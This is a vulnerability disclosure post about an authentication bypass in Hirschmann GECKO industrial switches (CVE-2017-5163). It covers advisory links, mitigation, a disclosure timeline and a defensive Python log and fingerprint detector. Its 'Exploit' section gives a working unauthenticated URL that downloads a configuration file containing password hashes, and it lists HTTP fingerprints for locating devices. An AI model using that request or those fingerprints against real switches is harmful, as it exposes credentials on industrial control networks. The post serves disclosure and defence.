[0day] Authentication Bypass on Belden Hirschmann GECKO switches


Abstract

Last summer, during a pentest for a client, we came across industrial switches made by Hirschmann, “a Belden Brand, (which) provides the industry with leading Ethernet networking technology and sets the industrial networking standards for quality, reliability and service.” (Source: http://www.belden.com/aboutbelden/brands/Hirschmann.cfm ), and found a few previously unknown vulnerabilities (0day) affecting firmware version 2.0.00 and prior versions. We chose to responsibly disclose them, directly to Hirschmann and to the ICS-CERT (Industrial Control Systems Cyber Emergency Response Team). Since then a new firmware (2.0.01) has been released to patch one of them (the most critical). ICS-CERT has released an advisory and a CVE (CVE-2017-5163) has been assigned.

Many thanks to Hirschmann and the ICS-CERT teams.

Advisories

« (…) After an administrator downloads a configuration file, a copy of the configuration file, which includes hashes of user passwords, is saved to a location that is accessible without authentication. (…) ».

https://ics-cert.us-cert.gov/advisories/ICSA-17-026-02A

https://www.belden.com/resourcecenter/security/upload/Belden-Security-Bulletin-BSECV-2016-5.pdf

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5163

 

Exploit

As simple as:

https://ip/download/config_download?download=config.bin

 

Mitigation

Belden has released a new software version, Version 02.0.01, to address the identified vulnerability, which is available at the following location:

https://www.e-catalog.beldensolutions.com/link/57078-24455-402707-402708/en/conf/0

 

In the wild

As this is an industrial switch, it should not be connected directly to the Internet, and searches on Google or Shodan shouldn’t give any results.

But if needed, here are the HTTP headers:

HTTP/1.1 200 OK
Server: libCWebUI
Accept-Ranges: bytes
Content-Length: 5823
Content-Type: text/html
Connection: close

(...)

GECKO 4TX</title>
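The two things a defender can act on from this post are the request path that serves the cached configuration copy (the URL in the Exploit section) and the HTTP fingerprint above (the `Server: libCWebUI` header and the `GECKO 4TX` page title). The following Python is an added example, not code from the original post or from Belden/Hirschmann: it identifies GECKO web UIs from a captured HTTP response so they can be inventoried and patched, and flags successful unauthenticated requests for `/download/config_download` in HTTP request logs (from a proxy, IDS or pcap export; the log format, the IP addresses and the HTML body are constructed for this example).

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple
from urllib.parse import urlsplit

# Fingerprint values taken from the response headers reproduced in the post.
GECKO_SERVER_HEADER = "libCWebUI"
GECKO_TITLE_MARK = "GECKO 4TX"
# Request path from the post's Exploit section (the cached configuration copy).
CONFIG_DOWNLOAD_PATH = "/download/config_download"

# Constructed log format for this example: <client ip> "<request line>" <status>
LOG_RE = re.compile(r'^(?P<ip>\S+)\s+"(?P<req>[^"]*)"\s+(?P<status>\d{3})\s*$')


@dataclass
class Fingerprint:
    is_gecko: bool
    server: Optional[str]
    title: Optional[str]


def fingerprint_response(raw: str) -> Fingerprint:
    """Classify a raw HTTP response as a GECKO web UI by Server header and <title>."""
    normalized = raw.replace("\r\n", "\n")
    head, _, body = normalized.partition("\n\n")
    headers = {}
    for line in head.split("\n")[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    server = headers.get("server")
    match = re.search(r"<title>\s*(.*?)\s*</title>", body, re.I | re.S)
    title = match.group(1) if match else None
    is_gecko = server == GECKO_SERVER_HEADER or (title is not None and GECKO_TITLE_MARK in title)
    return Fingerprint(is_gecko=is_gecko, server=server, title=title)


def is_config_download_request(request_line: str) -> bool:
    """True when an HTTP request line targets the cached configuration path."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    method, target = parts[0], parts[1]
    return method.upper() == "GET" and urlsplit(target).path == CONFIG_DOWNLOAD_PATH


def find_config_exposures(log_lines: Iterable[str], allowed_admins=frozenset()) -> List[Tuple[str, str]]:
    """Return (ip, request) pairs where the configuration copy was served (HTTP 200)
    to a client that is not a known administrator host. A 404/403 means the device
    had nothing cached or is patched, so it is not reported."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, req, status = m.group("ip"), m.group("req"), int(m.group("status"))
        if is_config_download_request(req) and status == 200 and ip not in allowed_admins:
            hits.append((ip, req))
    return hits


# Constructed sample response: headers as in the post, body invented for the example.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: libCWebUI\r\n"
    "Accept-Ranges: bytes\r\n"
    "Content-Length: 5823\r\n"
    "Content-Type: text/html\r\n"
    "Connection: close\r\n"
    "\r\n"
    "<html><head><title>GECKO 4TX</title></head><body></body></html>"
)

# Constructed sample log: 192.0.2.10 is the known admin host, 198.51.100.7 is not.
SAMPLE_LOG = [
    '192.0.2.10 "GET / HTTP/1.1" 200',
    '192.0.2.10 "GET /download/config_download?download=config.bin HTTP/1.1" 200',
    '198.51.100.7 "GET /download/config_download?download=config.bin HTTP/1.1" 200',
    '198.51.100.7 "GET /download/config_download?download=config.bin HTTP/1.1" 404',
]

if __name__ == "__main__":
    print(fingerprint_response(SAMPLE_RESPONSE))
    for ip, req in find_config_exposures(SAMPLE_LOG, {"192.0.2.10"}):
        print(f"ALERT: configuration copy served to {ip}: {req}")
```

On the sample data the fingerprint reports a GECKO device and exactly one alert (the non-admin host that received a 200). The allow-list of administrator hosts keeps the legitimate download that creates the cached copy out of the alerts; everything else that successfully fetches that path is worth investigating, and a device that still answers 200 for it is a candidate for the 2.0.01 update.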

 

Timeline

2016/07/14         First contact by mail

2016/07/14         Full report sent by mail to Hirschmann -> they start investigation

2016/09/07         Hirschmann phone call -> they work on a fix

2016/10/11         Hirschmann mail: “The new firmware release candidate passed internal tests and we are going to finalize it soon and publish the new release together with a Security Bulletin mentioning your efforts as key to the whole release.”

2016/10/11         Hirschmann mail with a link to the RC of their new firmware and a “Security Bulletin” which says: “The user authentication for downloading the configuration file can be bypassed after a user with administrator privileges downloads the configuration file.”

2016/10/12         Answer to Hirschmann to ask if the other vulnerabilities have been taken into account

2016/11/18         Answer from Hirschmann: “We are expecting the Final version of the Firmware in the next couple of days, after which we will follow a quick release process. We will release this version together with the security announcement mentioning your discovery and assistance. The additional issues you reported will be assessed again and we will discuss when or if they will be included.”

2016/11/24         Full report sent to ICS-CERT

2016/12/14         New firmware released (2.0.1)

2016/12/19         Belden advisory released

2017/01/26        ICS-CERT advisory released